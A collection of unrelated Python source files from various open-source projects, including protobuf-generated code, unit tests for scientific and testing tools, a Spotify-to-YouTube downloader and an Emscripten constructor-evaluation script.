serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=266,
serialized_end=539,
)
_POSTPROCESSING.fields_by_name['batch_non_max_suppression'].message_type = _BATCHNONMAXSUPPRESSION
_POSTPROCESSING.fields_by_name['score_converter'].enum_type = _POSTPROCESSING_SCORECONVERTER
_POSTPROCESSING_SCORECONVERTER.containing_type = _POSTPROCESSING
DESCRIPTOR.message_types_by_name['BatchNonMaxSuppression'] = _BATCHNONMAXSUPPRESSION
DESCRIPTOR.message_types_by_name['PostProcessing'] = _POSTPROCESSING
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
BatchNonMaxSuppression = _reflection.GeneratedProtocolMessageType('BatchNonMaxSuppression', (_message.Message,), {
'DESCRIPTOR' : _BATCHNONMAXSUPPRESSION,
'__module__' : 'object_detection.protos.post_processing_pb2'
# @@protoc_insertion_point(class_scope:object_detection.protos.BatchNonMaxSuppression)
})
_sym_db.RegisterMessage(BatchNonMaxSuppression)
PostProcessing = _reflection.GeneratedProtocolMessageType('PostProcessing', (_message.Message,), {
'DESCRIPTOR' : _POSTPROCESSING,
'__module__' : 'object_detection.protos.post_processing_pb2'
# @@protoc_insertion_point(class_scope:object_detection.protos.PostProcessing)
})
_sym_db.RegisterMessage(PostProcessing)
# @@protoc_insertion_point(module_scope)
|
py | 1a3305ee37985617a33e7786a21adb820337f58f | import os
import pickle
from pathlib import Path
import pytest
import autofit as af
from autoconf.conf import output_path_for_test
from autofit.non_linear.paths.null import NullPaths
def test_null_paths():
search = af.DynestyStatic()
assert isinstance(
search.paths,
NullPaths
)
class TestPathDecorator:
@staticmethod
def assert_paths_as_expected(paths):
assert paths.name == "name"
assert paths.path_prefix == ""
def test_with_arguments(self):
search = af.MockSearch()
search.paths = af.DirectoryPaths(name="name")
self.assert_paths_as_expected(search.paths)
def test_positional(self):
search = af.MockSearch("name")
paths = search.paths
assert paths.name == "name"
def test_paths_argument(self):
search = af.MockSearch()
search.paths = af.DirectoryPaths(name="name")
self.assert_paths_as_expected(search.paths)
def test_combination_argument(self):
search = af.MockSearch("other", )
search.paths = af.DirectoryPaths(name="name")
self.assert_paths_as_expected(search.paths)
output_path = Path(
__file__
).parent / "path"
@pytest.fixture(
name="model"
)
def make_model():
return af.Model(
af.Gaussian
)
@output_path_for_test(
output_path
)
def test_identifier_file(model):
paths = af.DirectoryPaths()
paths.model = model
paths.search = af.DynestyStatic()
paths.save_all({}, {}, [])
assert os.path.exists(
output_path / paths.identifier / ".identifier"
)
def test_serialize(model):
paths = af.DirectoryPaths()
paths.model = model
pickled_paths = pickle.loads(
pickle.dumps(
paths
)
)
assert pickled_paths.model is not None
|
py | 1a33074e546bd156e003d301288d40c839243901 | import game
import pygame
from config import Config
class Main:
def __init__(self):
self.game_clock = pygame.time.Clock()
self.game = game.Game()
def mainloop(self):
while Config.BOOLEAN['game_loop']:
self.game.change_screen()
self.game_clock.tick(Config.CONSTANT['CLOCK'])
main = Main()
if __name__ == '__main__':
main.mainloop()
|
py | 1a33082880b7c05937b251b8bf35561afc78ab52 | """Unit tests for processor, focusing on multiple functions at a time."""
from pathlib import Path
import numpy as np
import pytest
from rimseval.processor import CRDFileProcessor
def test_integrals(crd_file):
"""Define an integral manually and calculate the integration."""
_, ions_per_shot, all_tofs, fname = crd_file
crd = CRDFileProcessor(Path(fname))
crd.spectrum_full()
# set some random mass cal from 1 to 2
crd.def_mcal = np.array([[crd.tof.min(), 1.0], [crd.tof.max(), 2.0]])
crd.mass_calibration()
# now set the integrals to include everything
crd.def_integrals = (["all"], np.array([[0.9, 2.1]])) # avoid floating errors
crd.integrals_calc()
assert len(all_tofs) == crd.integrals[0][0]
assert pytest.approx(np.sqrt(len(all_tofs)) == crd.integrals[0][1])
def test_integrals_bg_corr_behavior(crd_file):
"""Ensure that bg corrected integrals behave correctly."""
_, ions_per_shot, all_tofs, fname = crd_file
shots_per_pkg = 2
nof_pkgs = int(np.ceil(len(ions_per_shot) / shots_per_pkg))
integrals_exp = np.zeros((nof_pkgs, 1, 2)) # 1 integral
start_ind = 0
for it in range(nof_pkgs - 1):
stop_ind = start_ind + shots_per_pkg
integrals_exp[it][0][0] = np.sum(ions_per_shot[start_ind:stop_ind])
integrals_exp[it][0][1] = np.sqrt(integrals_exp[it][0][0])
start_ind = stop_ind
# add the last
integrals_exp[-1][0][0] = np.sum(ions_per_shot[start_ind:])
integrals_exp[-1][0][1] = np.sqrt(integrals_exp[-1][0][0])
crd = CRDFileProcessor(Path(fname))
crd.spectrum_full()
crd.packages(shots_per_pkg)
# set some random mass cal from 1 to 2
crd.def_mcal = np.array([[crd.tof.min(), 1.0], [crd.tof.max(), 2.0]])
crd.mass_calibration()
# now set the integrals to include everything
crd.def_integrals = (["all"], np.array([[0.9, 2.1]])) # avoid floating errors
crd.integrals_calc()
integrals_only = np.array(crd.integrals)
integrals_pkg_only = np.array(crd.integrals_pkg)
# set the background correction
crd.def_backgrounds = (["all"], np.array([[0.1, 0.9]]))
crd.integrals_calc()
# now make sure that integrals are always smaller when bg corrected than when not
assert all(crd.integrals[:, 0] <= integrals_only[:, 0])
assert all(crd.integrals[:, 1] >= integrals_only[:, 1])
# sum of packaged integrals is still equal to sum of integrals
np.testing.assert_allclose(crd.integrals_pkg.sum(axis=0)[:, 0], crd.integrals[:, 0])
def test_integrals_pkg(crd_file):
"""Define an integral manually and calculate the integration for packages."""
_, ions_per_shot, all_tofs, fname = crd_file
shots_per_pkg = 2
nof_pkgs = int(np.ceil(len(ions_per_shot) / shots_per_pkg))
integrals_exp = np.zeros((nof_pkgs, 1, 2)) # 1 integral
start_ind = 0
for it in range(nof_pkgs - 1):
stop_ind = start_ind + shots_per_pkg
integrals_exp[it][0][0] = np.sum(ions_per_shot[start_ind:stop_ind])
integrals_exp[it][0][1] = np.sqrt(integrals_exp[it][0][0])
start_ind = stop_ind
# add the last
integrals_exp[-1][0][0] = np.sum(ions_per_shot[start_ind:])
integrals_exp[-1][0][1] = np.sqrt(integrals_exp[-1][0][0])
crd = CRDFileProcessor(Path(fname))
crd.spectrum_full()
crd.packages(shots_per_pkg)
# set some random mass cal from 1 to 2
crd.def_mcal = np.array([[crd.tof.min(), 1.0], [crd.tof.max(), 2.0]])
crd.mass_calibration()
# now set the integrals to include everything
crd.def_integrals = (["all"], np.array([[0.9, 2.1]])) # avoid floating errors
crd.integrals_calc()
np.testing.assert_almost_equal(crd.integrals_pkg, integrals_exp)
# check that sum agrees -> sqrt of sqsum for uncertainty
crd_integrals_sum = np.array(crd.integrals_pkg)
crd_integrals_sum[:, :, 1] = crd_integrals_sum[:, :, 1] ** 2
crd_integrals_sum = crd_integrals_sum.sum(axis=0)
crd_integrals_sum[:, 1] = np.sqrt(crd_integrals_sum[:, 1])
np.testing.assert_almost_equal(crd.integrals, crd_integrals_sum)
def test_integrals_pkg_with_filtering(crd_file):
"""Filtering in packages and get the sum of the integrals."""
_, _, _, fname = crd_file
shots_per_pkg = 1
max_ions_per_shot = 1
crd = CRDFileProcessor(Path(fname))
crd.spectrum_full()
crd.packages(shots_per_pkg)
crd.filter_max_ions_per_pkg(1)
# set some random mass cal from 1 to 2
crd.def_mcal = np.array([[crd.tof.min(), 1.0], [crd.tof.max(), 2.0]])
crd.mass_calibration()
# now set the integrals to include everything
crd.def_integrals = (["all"], np.array([[0.9, 2.1]])) # avoid floating errors
crd.integrals_calc()
# check that sum agrees -> sqrt of sqsum for uncertainty
crd_integrals_sum = np.array(crd.integrals_pkg)
crd_integrals_sum[:, :, 1] = crd_integrals_sum[:, :, 1] ** 2
crd_integrals_sum = crd_integrals_sum.sum(axis=0)
crd_integrals_sum[:, 1] = np.sqrt(crd_integrals_sum[:, 1])
np.testing.assert_almost_equal(crd.integrals, crd_integrals_sum)
|
py | 1a3308ca4c2bf4b31d0fb989ba0b54618439e4d6 | from __future__ import unicode_literals
import re
import os
import spotipy.util as util
import youtube_dl
from spotify_dl.scaffold import *
def authenticate():
"""Authenticates you to Spotify
"""
scope = 'user-library-read'
username = ''
return util.prompt_for_user_token(username, scope)
def fetch_tracks(sp, playlist, user_id):
"""Fetches tracks from Spotify user's saved
tracks or from playlist(if playlist parameter is passed
and saves song name and artist name to songs list
"""
log.debug('Fetching saved tracks')
offset = 0
songs_dict = {}
if user_id is None:
current_user_id = sp.current_user()['id']
else:
current_user_id = user_id
while True:
if playlist is None:
results = sp.current_user_saved_tracks(limit=50, offset=offset)
else:
results = sp.user_playlist_tracks(current_user_id, playlist, None,
limit=50, offset=offset)
log.debug('Got result json %s', results)
for item in results['items']:
track = item['track']
if track is not None:
track_name = str(track['name'])
track_artist = str(track['artists'][0]['name'])
log.debug('Appending %s to'
'songs list', (track['name'] + ' - ' + track['artists'][0]['name']))
songs_dict.update({track_name: track_artist})
else:
log.warning("Track/artist name for %s not found, skipping", track)
offset += 1
if results.get('next') is None:
log.info('All pages fetched, time to leave.'
' Added %s songs in total', offset)
break
return songs_dict
def save_songs_to_file(songs, directory):
"""
:param songs
Saves the songs fetched from fetch_tracks function to songs.txt file
to be downloaded from youtube-dl
"""
with open(os.path.join(directory, 'songs.txt'), 'w', encoding="utf-8") as f:
f.write(' '.join(str(songs)))
f.close()
def download_songs(info, download_directory, format_string, skip_mp3):
"""
Downloads songs from the YouTube URL passed to either
current directory or download_directory, is it is passed
"""
for item in info:
log.debug('Songs to download: %s', item)
url_, track_, artist_ = item
download_archive = download_directory + 'downloaded_songs.txt'
outtmpl = download_directory + '%(title)s.%(ext)s'
ydl_opts = {
'format': format_string,
'download_archive': download_archive,
'outtmpl': outtmpl,
'noplaylist': True,
'postprocessor_args': ['-metadata', 'title=' + str(track_),
'-metadata', 'artist=' + str(artist_)],
}
if not skip_mp3:
mp3_postprocess_opts = {
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '192',
}
ydl_opts['postprocessors'] = [mp3_postprocess_opts.copy()]
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
try:
log.debug(ydl.download([url_]))
except Exception as e:
log.debug(e)
print('Failed to download: {}'.format(url_))
continue
def extract_user_and_playlist_from_uri(uri, sp):
playlist_re = re.compile("(spotify)(:user:[\w,.]+)?(:playlist:[\w]+)")
user_id = sp.current_user()['id']
for playlist_uri in ["".join(x) for x in playlist_re.findall(uri)]:
segments = playlist_uri.split(":")
if len(segments) >= 4:
user_id = segments[2]
playlist_id = segments[4]
log.info('List ID: ' + str(playlist_id))
else:
playlist_id = segments[2]
log.info('List ID: ' + str(playlist_id))
log.info('List owner: ' + str(user_id))
return user_id, playlist_id
def playlist_name(uri, sp):
user_id, playlist_id = extract_user_and_playlist_from_uri(uri, sp)
return get_playlist_name_from_id(playlist_id, user_id, sp)
def get_playlist_name_from_id(playlist_id, user_id, sp):
playlist = sp.user_playlist(user_id, playlist_id,
fields="tracks, next, name")
name = playlist['name']
return name
|
py | 1a330928b8cfc8b23c6163384f49d5a9059ac696 | from slideshow import SlideShow
def test_init_title(mocker):
"""Test init function sets title value"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("ZlNLpWJUv52wgu2Y", stub)
slideshow.root.title.assert_called_once_with("ZlNLpWJUv52wgu2Y")
def test_init_callback(mocker):
"""Test init function sets callback"""
stub = mocker.stub()
slideshow = SlideShow("", stub)
assert slideshow.start_callback == stub
def test_init_geometry(mocker):
"""Test init function sets geometry values"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("", stub, 500, 600)
slideshow.root.geometry.assert_called_once_with("500x600+0+0")
def test_show(mocker):
"""Test show function calls Tk.mainloop()"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("", stub)
slideshow.show()
slideshow.root.mainloop.assert_called_once_with()
def test_toggle_start_active(mocker):
"""Test toggle_start sets active value"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("", stub)
assert slideshow.is_active() is False
slideshow.toggle_start()
assert slideshow.is_active() is True
def test_toggle_start_callback(mocker):
"""Test toggle_start calls the callback function"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("", stub)
slideshow.toggle_start()
stub.assert_called_once_with()
def test_toggle_start_buttontext(mocker):
"""Test toggle_start changes the button text"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
mocker.patch("tkinter.Button")
slideshow = SlideShow("", stub)
slideshow.toggle_start()
slideshow.startstop_button.config.assert_called_once_with(text="Stop")
slideshow.toggle_start()
slideshow.startstop_button.config.assert_called_with(text="Start")
def test_update_progress(mocker):
"""Test update_progress sets expected value"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
mocker.patch("tkinter.Label")
slideshow = SlideShow("", stub)
slideshow.update_progress(500, 600, "gx8oN6ZDHc3lv3xy")
slideshow.progress_label.config.assert_called_once_with(text="500 (83.33%): gx8oN6ZDHc3lv3xy")
|
py | 1a33097aeaf793f10935290949ba1a0550f827a2 | import os
import re
import shutil
import yaml
from io import BytesIO
import bzt
from bzt import ToolError, TaurusConfigError
from bzt.engine import EXEC
from bzt.modules._apiritif import ApiritifNoseExecutor
from bzt.modules.functional import LoadSamplesReader, FuncSamplesReader
from bzt.modules.provisioning import Local
from bzt.modules._selenium import SeleniumExecutor
from bzt.utils import LDJSONReader, FileReader
from tests.unit import BZTestCase, RESOURCES_DIR, ROOT_LOGGER, EngineEmul
from tests.unit.mocks import DummyListener
from tests.unit.modules._selenium import SeleniumTestCase, MockPythonTool
class LDJSONReaderEmul(object):
def __init__(self):
self.data = []
def read(self, last_pass=False):
for line in self.data:
yield line
class TestSeleniumExecutor(SeleniumTestCase):
# todo: get_error_diagnostics: only geckodriver, not chrome-?
def setUp(self):
super(TestSeleniumExecutor, self).setUp()
self.CMD_LINE = ''
def start_subprocess(self, args, **kwargs):
self.CMD_LINE = " ".join(args)
def obj_prepare(self):
tmp_tool = bzt.modules._apiritif.executor.Apiritif
try:
bzt.modules._apiritif.executor.Apiritif = MockPythonTool
bzt.modules._selenium.Selenium.version = "3"
self.obj.prepare()
finally:
bzt.modules._apiritif.executor.Apiritif = tmp_tool
def test_data_source_in_action(self):
self.configure({
EXEC: {
"executor": "selenium",
"iterations": 1,
"scenario": {
"data-sources": [RESOURCES_DIR + "selenium/data-sources/data.csv"],
"requests": [{
"label": "exec_it",
"assert": ["Simple Travel Agency"],
"actions": ["go(${host}/${page})"]}]}}})
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
def test_user_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"iterations": 100,
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertIn("--iterations 100", self.CMD_LINE)
def test_load_no_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = False
self.obj.engine.start_subprocess = self.start_subprocess
self.obj_prepare()
self.obj.startup()
self.obj.post_process()
self.assertIn("--iterations 1", self.CMD_LINE)
def test_load_no_iter_duration(self):
self.configure({
EXEC: {
"executor": "apiritif",
"hold-for": "2s",
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = False
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertNotIn("--iterations", self.CMD_LINE)
def test_func_no_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertIn("--iterations 1", self.CMD_LINE)
def test_func_0_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"iterations": 0,
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertNotIn('--iterations', self.CMD_LINE)
def test_func_ds_0_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"iterations": 0,
"scenario": {
"data-sources": ['one.csv'],
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertNotIn('--iterations', self.CMD_LINE)
def test_func_ds_no_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"scenario": {
"data-sources": ['one.csv'],
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertNotIn('--iterations', self.CMD_LINE)
class TestSeleniumStuff(SeleniumTestCase):
def start_subprocess(self, args, **kwargs):
self.CMD_LINE = args
def obj_prepare(self):
tmp_tool = bzt.modules._apiritif.executor.Apiritif
try:
bzt.modules._apiritif.executor.Apiritif = MockPythonTool
bzt.modules._selenium.Selenium.version = "3"
self.obj.prepare()
finally:
bzt.modules._apiritif.executor.Apiritif = tmp_tool
def obj_prepare_runner(self):
super(SeleniumExecutor, self.obj).prepare()
self.obj.install_required_tools()
for driver in self.obj.webdrivers:
self.obj.env.add_path({"PATH": driver.get_dir()})
self.obj.create_runner()
self.obj.runner._check_tools = lambda *args: None
self.obj.runner._compile_scripts = lambda: None
tmp_tool = bzt.modules._apiritif.executor.Apiritif
try:
bzt.modules._apiritif.executor.Apiritif = MockPythonTool
bzt.modules._selenium.Selenium.version = "3"
self.obj.runner.prepare()
finally:
bzt.modules._apiritif.executor.Apiritif = tmp_tool
self.obj.script = self.obj.runner.script
def test_empty_scenario(self):
"""
Raise runtime error when no scenario provided
:return:
"""
self.configure({EXEC: {"executor": "selenium"}})
self.assertRaises(TaurusConfigError, self.obj_prepare)
def test_various_raise(self):
self.configure({ # RuntimeError when
EXEC: [{ # compilation fails
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/invalid.java"}
}, { # no files of known types were found.
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/not_found"}
}]})
self.assertRaises(ToolError, self.obj_prepare)
def test_empty_test_methods(self):
self.configure({ # Test exact number of tests when
EXEC: [{ # java annotations used
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/SeleniumTest.java"}
}, { # test class extends JUnit TestCase
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/SimpleTest.java"}
}, { # annotations used and no "test" in class name
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/selenium1.java"}
}]})
self.obj_prepare_runner()
def test_from_extension(self):
self.configure(yaml.full_load(open(RESOURCES_DIR + "yaml/selenium_from_extension.yml").read()))
self.obj_prepare()
self.obj.get_widget()
self.obj.engine.start_subprocess = lambda **kwargs: None
self.obj.startup()
self.obj.post_process()
def test_requests(self):
self.configure(yaml.full_load(open(RESOURCES_DIR + "yaml/selenium_executor_requests.yml").read()))
self.obj_prepare()
self.obj.get_widget()
self.obj.engine.start_subprocess = lambda **kwargs: None
self.obj.startup()
self.obj.post_process()
def test_fail_on_zero_results(self):
self.configure(yaml.full_load(open(RESOURCES_DIR + "yaml/selenium_executor_requests.yml").read()))
self.obj_prepare()
self.obj.engine.prepared = [self.obj]
self.obj.engine.started = [self.obj]
prov = Local()
prov.engine = self.obj.engine
prov.executors = [self.obj]
prov.started_modules = [self.obj]
self.obj.engine.provisioning = prov
self.assertRaises(ToolError, self.obj.engine.provisioning.post_process)
def test_aremote_prov_requests(self):
self.obj.execution.merge({
"scenario": {
"requests": [
"http://blazedemo.com"]}})
resources = self.obj.resource_files()
self.assertEqual(0, len(resources))
def test_dont_copy_local_script_to_artifacts(self):
filename = "BlazeDemo.java" # ensures that .java file is not copied into artifacts-dir
script_path = RESOURCES_DIR + "" + filename
self.obj.execution.merge({
"scenario": {
"script": script_path,
}
})
files = self.obj.resource_files()
self.obj_prepare_runner()
self.assertIn(script_path, files)
artifacts_script = os.path.join(self.obj.engine.artifacts_dir, filename)
self.assertFalse(os.path.exists(artifacts_script))
def test_take_script_from_artifacts(self):
"""ensures that executor looks for script in artifacts-dir (for cloud/remote cases)"""
self.obj.engine.file_search_paths = [self.obj.engine.artifacts_dir]
script_name = "BlazeDemo.java"
test_script = RESOURCES_DIR + "" + script_name
artifacts_script = os.path.join(self.obj.engine.artifacts_dir, script_name)
shutil.copy2(test_script, artifacts_script)
self.obj.execution.merge({
"scenario": {
"script": script_name,
}
})
self.obj_prepare_runner()
def test_do_not_modify_scenario_script(self):
self.obj.execution.merge({
"scenario": {
"requests": ["address"],
}
})
self.obj_prepare()
self.assertNotIn("script", self.obj.get_scenario())
def test_default_address_gen(self):
self.obj.execution.merge({
"scenario": {
"default-address": "http://blazedemo.com",
"requests": ["/", "http://absolute.address.com/somepage", "/reserve.php"],
}
})
self.obj_prepare()
with open(os.path.join(self.obj.engine.artifacts_dir, os.path.basename(self.obj.script))) as fds:
script = fds.read()
urls = re.findall(r"\.get\('(.+)'\)", script)
self.assertEqual("http://blazedemo.com/", urls[0])
self.assertEqual("http://absolute.address.com/somepage", urls[1])
self.assertEqual("http://blazedemo.com/reserve.php", urls[2])
def test_force_runner(self):
self.obj.execution.merge({
'scenario': {'script': RESOURCES_DIR + 'selenium/junit/jar/'},
'runner': 'apiritif',
})
self.obj_prepare()
self.assertIsInstance(self.obj.runner, ApiritifNoseExecutor)
def test_additional_classpath_resource_files(self):
self.obj.execution.merge({
'scenario': {
'script': RESOURCES_DIR + 'selenium/junit/jar/dummy.jar',
'runner': 'junit',
'additional-classpath': [RESOURCES_DIR + 'selenium/junit/jar/another_dummy.jar']}})
self.obj.engine.config.merge({
'modules': {
'junit': {
'additional-classpath': [RESOURCES_DIR + 'selenium/testng/jars/testng-suite.jar']}}})
own_resources = self.obj.resource_files()
all_resources = list(set(self.obj.get_resource_files()))
# scenario.script, scenario.additional-classpath, settings.additional-classpath
self.assertEqual(len(own_resources), 2)
self.assertEqual(len(all_resources), 3)
def test_add_env_path(self):
path1 = os.path.join("foo", "bar")
path2 = os.path.join("bar", "baz")
self.obj.env.add_path({"PATH": path1})
self.obj.env.add_path({"PATH": path2})
self.assertIn(path1, self.obj.env.get("PATH"))
self.assertIn(path2, self.obj.env.get("PATH"))
def test_subscribe_to_transactions(self):
dummy = DummyListener()
self.configure({
'execution': {
"iterations": 5,
'scenario': {'script': RESOURCES_DIR + 'selenium/python/test_selenium_transactions.py'},
'executor': 'selenium'
},
})
self.obj_prepare_runner()
self.obj.subscribe_to_transactions(dummy)
try:
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
fake_out = os.path.join(RESOURCES_DIR, 'apiritif/dummy-output.out')
self.obj.runner._tailer = FileReader(filename=fake_out, parent_logger=self.log)
finally:
self.obj.shutdown()
self.obj.post_process()
self.assertEqual(10, dummy.transactions['hello there'])
class TestReportReader(BZTestCase):
def test_report_reader(self):
reader = LoadSamplesReader(RESOURCES_DIR + "selenium/report.ldjson", ROOT_LOGGER)
items = list(reader._read(last_pass=True))
self.assertEqual(4, len(items))
self.assertEqual(items[0][1], 'testFailure')
self.assertEqual(items[0][6], '400')
self.assertEqual(items[1][1], 'testBroken')
self.assertEqual(items[1][6], '500')
self.assertEqual(items[2][1], 'testSuccess')
self.assertEqual(items[2][6], '200')
self.assertEqual(items[3][1], 'testUnexp')
self.assertEqual(items[3][6], 'UNKNOWN')
def test_reader_buffering(self):
first_part = b'{"a": 1, "b": 2}\n{"a": 2,'
second_part = b'"b": 3}\n{"a": 3, "b": 4}\n'
reader = LDJSONReader("yip", ROOT_LOGGER)
buffer = BytesIO(first_part)
reader.file.fds = buffer
reader.file.fds.name = "yip"
items = list(reader.read(last_pass=False))
self.assertEqual(len(items), 1)
buffer.write(second_part)
items = list(reader.read(last_pass=False))
self.assertEqual(len(items), 2)
def test_func_reader(self):
reader = FuncSamplesReader(RESOURCES_DIR + "selenium/report.ldjson", EngineEmul(), ROOT_LOGGER)
items = list(reader.read(last_pass=True))
self.assertEqual(5, len(items))
self.assertEqual(items[0].test_case, 'testFailure')
self.assertEqual(items[0].status, "FAILED")
self.assertEqual(items[1].test_case, 'testBroken')
self.assertEqual(items[1].status, "BROKEN")
self.assertEqual(items[2].test_case, 'testSuccess')
self.assertEqual(items[2].status, "PASSED")
self.assertEqual(items[4].test_case, 'SkippedTest')
self.assertEqual(items[4].status, "SKIPPED")
|
py | 1a330a7ca925edb5c4efecfbc09bff46fa1f633e | #!/usr/bin/env python3
# Copyright 2016 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""Tries to evaluate global constructors, applying their effects ahead of time.
This is an LTO-like operation, and to avoid parsing the entire tree (we might
fail to parse a massive project, we operate on the text in python.
"""
import logging
import os
import subprocess
import sys
__scriptdir__ = os.path.dirname(os.path.abspath(__file__))
__rootdir__ = os.path.dirname(__scriptdir__)
sys.path.append(__rootdir__)
from tools import utils
js_file = sys.argv[1]
binary_file = sys.argv[2] # mem init for js, wasm binary for wasm
total_memory = int(sys.argv[3])
total_stack = int(sys.argv[4])
global_base = int(sys.argv[5])
binaryen_bin = sys.argv[6]
debug_info = int(sys.argv[7])
extra_args = sys.argv[8:]
wasm = bool(binaryen_bin)
assert global_base > 0
logger = logging.getLogger('ctor_evaller')
# helpers
def find_ctors(js):
ctors_start = js.find('__ATINIT__.push(')
if ctors_start < 0:
return (-1, -1)
ctors_end = js.find(');', ctors_start)
assert ctors_end > 0
ctors_end += 3
return (ctors_start, ctors_end)
def find_ctors_data(js, num):
ctors_start, ctors_end = find_ctors(js)
assert ctors_start > 0
ctors_text = js[ctors_start:ctors_end]
all_ctors = [ctor for ctor in ctors_text.split(' ') if ctor.endswith('()') and not ctor == 'function()' and '.' not in ctor]
all_ctors = [ctor.replace('()', '') for ctor in all_ctors]
assert all(ctor.startswith('_') for ctor in all_ctors)
all_ctors = [ctor[1:] for ctor in all_ctors]
assert len(all_ctors)
ctors = all_ctors[:num]
return ctors_start, ctors_end, all_ctors, ctors
def eval_ctors(js, wasm_file, num):
ctors_start, ctors_end, all_ctors, ctors = find_ctors_data(js, num)
cmd = [os.path.join(binaryen_bin, 'wasm-ctor-eval'), wasm_file, '-o', wasm_file, '--ctors=' + ','.join(ctors)]
cmd += extra_args
if debug_info:
cmd += ['-g']
logger.debug('wasm ctor cmd: ' + str(cmd))
try:
err = subprocess.run(cmd, stderr=subprocess.PIPE, timeout=10).stdout
except subprocess.TimeoutExpired:
logger.debug('ctors timed out\n')
return 0, js
num_successful = err.count('success on')
logger.debug(err)
if len(ctors) == num_successful:
new_ctors = ''
else:
elements = []
for ctor in all_ctors[num_successful:]:
elements.append('{ func: function() { %s() } }' % ctor)
new_ctors = '__ATINIT__.push(' + ', '.join(elements) + ');'
js = js[:ctors_start] + new_ctors + js[ctors_end:]
return num_successful, js
# main
def main():
js = utils.read_file(js_file)
ctors_start, ctors_end = find_ctors(js)
if ctors_start < 0:
logger.debug('ctor_evaller: no ctors')
sys.exit(0)
ctors_text = js[ctors_start:ctors_end]
if ctors_text.count('(') == 1:
logger.debug('ctor_evaller: push, but no ctors')
sys.exit(0)
num_ctors = ctors_text.count('function()')
logger.debug('ctor_evaller: %d ctors, from |%s|' % (num_ctors, ctors_text))
wasm_file = binary_file
logger.debug('ctor_evaller (wasm): trying to eval %d global constructors' % num_ctors)
num_successful, new_js = eval_ctors(js, wasm_file, num_ctors)
if num_successful == 0:
logger.debug('ctor_evaller: not successful')
sys.exit(0)
logger.debug('ctor_evaller: we managed to remove %d ctors' % num_successful)
utils.write_file(js_file, new_js)
if __name__ == '__main__':
sys.exit(main())
|
py | 1a330af9d877334c4cadb6ab4a7592f1e922b4bf | import os
from ..brew_exts import (
build_env_statements,
DEFAULT_HOMEBREW_ROOT,
recipe_cellar_path,
)
from ..resolvers import Dependency, NullDependency
class UsesHomebrewMixin:
def _init_homebrew(self, **kwds):
cellar_root = kwds.get('cellar', None)
if cellar_root is None:
cellar_root = os.path.join(DEFAULT_HOMEBREW_ROOT, "Cellar")
self.cellar_root = cellar_root
def _find_dep_versioned(self, name, version):
recipe_path = recipe_cellar_path(self.cellar_root, name, version)
if not os.path.exists(recipe_path) or not os.path.isdir(recipe_path):
return NullDependency(version=version, name=name)
commands = build_env_statements(self.cellar_root, recipe_path, relaxed=True)
return HomebrewDependency(commands)
def _find_dep_default(self, name, version):
installed_versions = self._installed_versions(name)
if not installed_versions:
return NullDependency(version=version, name=name)
# Just grab newest installed version - may make sense some day to find
# the linked version instead.
default_version = sorted(installed_versions, reverse=True)[0]
return self._find_dep_versioned(name, default_version, exact=version is None)
def _installed_versions(self, recipe):
recipe_base_path = os.path.join(self.cellar_root, recipe)
if not os.path.exists(recipe_base_path):
return []
names = os.listdir(recipe_base_path)
return filter(lambda n: os.path.isdir(os.path.join(recipe_base_path, n)), names)
class UsesToolDependencyDirMixin:
def _init_base_path(self, dependency_manager, **kwds):
self.base_path = os.path.abspath( kwds.get('base_path', dependency_manager.default_base_path) )
class UsesInstalledRepositoriesMixin:
def _get_installed_dependency( self, name, type, version=None, **kwds ):
installed_tool_dependencies = kwds.get("installed_tool_dependencies", [])
for installed_tool_dependency in (installed_tool_dependencies or []):
name_and_type_equal = installed_tool_dependency.name == name and installed_tool_dependency.type == type
